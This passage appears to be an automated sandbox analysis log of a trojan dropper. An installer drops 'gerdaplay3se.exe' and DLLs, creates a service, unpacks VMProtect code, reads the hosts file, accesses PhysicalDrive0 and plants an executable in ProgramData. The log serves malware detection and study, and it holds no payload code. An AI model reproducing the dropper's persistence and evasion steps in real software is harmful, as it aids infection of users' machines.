        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0045763C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_0045763C
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E944
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_0045568C
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040840C0_2_0040840C
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004708A01_2_004708A0
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00480E7E1_2_00480E7E
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0043533C1_2_0043533C
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0046744C1_2_0046744C
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004880141_2_00488014
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004303D01_2_004303D0
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0048E4AC1_2_0048E4AC
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0044453C1_2_0044453C
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004346381_2_00434638
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00444AE41_2_00444AE4
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00430F5C1_2_00430F5C
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004870B41_2_004870B4
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0045F16C1_2_0045F16C
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004451DC1_2_004451DC
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0045B21C1_2_0045B21C
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004694C81_2_004694C8
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004455E81_2_004455E8
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00451A301_2_00451A30
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0043DDC41_2_0043DDC4
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_004010513_2_00401051
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_00401C263_2_00401C26
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D9BCEB3_2_02D9BCEB
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D9B4E53_2_02D9B4E5
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D9BD583_2_02D9BD58
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D9B9503_2_02D9B950
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D853A03_2_02D853A0
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D7E18D3_2_02D7E18D
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D79E843_2_02D79E84
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D84E293_2_02D84E29
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D6EFB13_2_02D6EFB1
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D7DC993_2_02D7DC99
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D784423_2_02D78442
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D7AC3A3_2_02D7AC3A
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D82DB43_2_02D82DB4
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D7E5A53_2_02D7E5A5
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: String function: 02D85330 appears 139 times
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: String function: 02D78AE0 appears 37 times
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: String function: 00408C1C appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: String function: 00406AD4 appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: String function: 0040596C appears 117 times
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: String function: 00407904 appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: String function: 00403400 appears 60 times
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: String function: 00445E48 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: String function: 00457FC4 appears 77 times
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: String function: 00457DB8 appears 105 times
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: String function: 00434550 appears 32 times
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: String function: 00403494 appears 83 times
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: String function: 004533B8 appears 98 times
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: String function: 00446118 appears 59 times
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: String function: 00403684 appears 227 times
        Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: file.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-GKUSE.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: is-GKUSE.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: is-GKUSE.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-3CJHL.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: file.exe, 00000000.00000003.2109779269.0000000002310000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
        Source: file.exe, 00000000.00000003.2109905265.00000000020E8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
        Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: classification engineClassification label: mal100.troj.evad.winEXE@5/26@2/2
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_02D708B8 FormatMessageA,GetLastError,3_2_02D708B8
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_0045568C
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00455EB4 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455EB4
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_0040270C
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0046E1E4 GetVersion,CoCreateInstance,1_2_0046E1E4
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409C34
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_0040254E StartServiceCtrlDispatcherA,3_2_0040254E
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: 3_2_0040254E StartServiceCtrlDispatcherA,3_2_0040254E
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile read: C:\Windows\win.iniJump to behavior
        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: file.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
        Source: file.exeString found in binary or memory: /LOADINF="filename"
        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp" /SL5="$20434,3031792,56832,C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpProcess created: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe "C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe" -i
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp" /SL5="$20434,3031792,56832,C:\Users\user\Desktop\file.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpProcess created: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe "C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe" -iJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: rstrtmgr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: explorerframe.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: dsound.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpWindow found: window name: TMainFormJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: file.exeStatic file information: File size 3298104 > 1048576
        Source: Binary string: msvcp71.pdbx# source: is-RDVP8.tmp.1.dr
        Source: Binary string: msvcr71.pdb< source: is-8SV2U.tmp.1.dr
        Source: Binary string: F:\Temp\openssl-1.1.1t\libssl-1_1.pdb source: is-UG21C.tmp.1.dr
        Source: Binary string: msvcp71.pdb source: is-RDVP8.tmp.1.dr
        Source: Binary string: msvcr71.pdb source: is-8SV2U.tmp.1.dr

        Data Obfuscation

        barindex
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeUnpacked PE file: 3.2.gerdaplay3se.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeUnpacked PE file: 3.2.gerdaplay3se.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00450334 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00450334
        Source: is-3CJHL.tmp.1.drStatic PE information: section name: .eh_fram
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0048446C push 0048457Ah; ret 1_2_00484572
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0040995C push 00409999h; ret 1_2_00409991
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00458060 push 00458098h; ret 1_2_00458090
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004062C4 push ecx; mov dword ptr [esp], eax1_2_004062C5
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004104F0 push ecx; mov dword ptr [esp], edx1_2_004104F5
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00412938 push 0041299Bh; ret 1_2_00412993
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0049AD30 pushad ; retf 1_2_0049AD3F
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0040CE48 push ecx; mov dword ptr [esp], edx1_2_0040CE4A
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00459378 push 004593BCh; ret 1_2_004593B4
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00495384 push ecx; mov dword ptr [esp], ecx1_2_00495389
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0040F3A8 push ecx; mov dword ptr [esp], edx1_2_0040F3AA
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004434B4 push ecx; mov dword ptr [esp], ecx1_2_004434B8
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0045186C push 0045189Fh; ret 1_2_00451897
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00451A30 push ecx; mov dword ptr [esp], eax1_2_00451A35
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00485B5C push ecx; mov dword ptr [esp], ecx1_2_00485B61
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_00419C38 push ecx; mov dword ptr [esp], ecx1_2_00419C3D
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpCode function: 1_2_0045FDC4 push ecx; mov dword ptr [esp], ecx1_2_0045FDC8

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_00401A4F
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_02D6F7DA
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Gerda Play3 SE\is-N5JHT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Gerda Play3 SE\is-8SV2U.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Gerda Play3 SE\uninstall\is-GKUSE.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Gerda Play3 SE\is-REN2E.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Gerda Play3 SE\ssleay32.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Gerda Play3 SE\libssl-1_1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Gerda Play3 SE\is-3CJHL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Gerda Play3 SE\msvcr71.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exeFile created: C:\ProgramData\Eclipse IO Library 9.27.43\Eclipse IO Library 9.27.43.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-BCORL.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Gerda Play3 SE\Qt5OpenGL.dll (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Gerda Play3 SE\is-RDVP8.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Gerda Play3 SE\libeay32.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Gerda Play3 SE\msvcp71.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Gerda Play3 SE\uninstall\unins000.exe (copy)Jump to dropped file
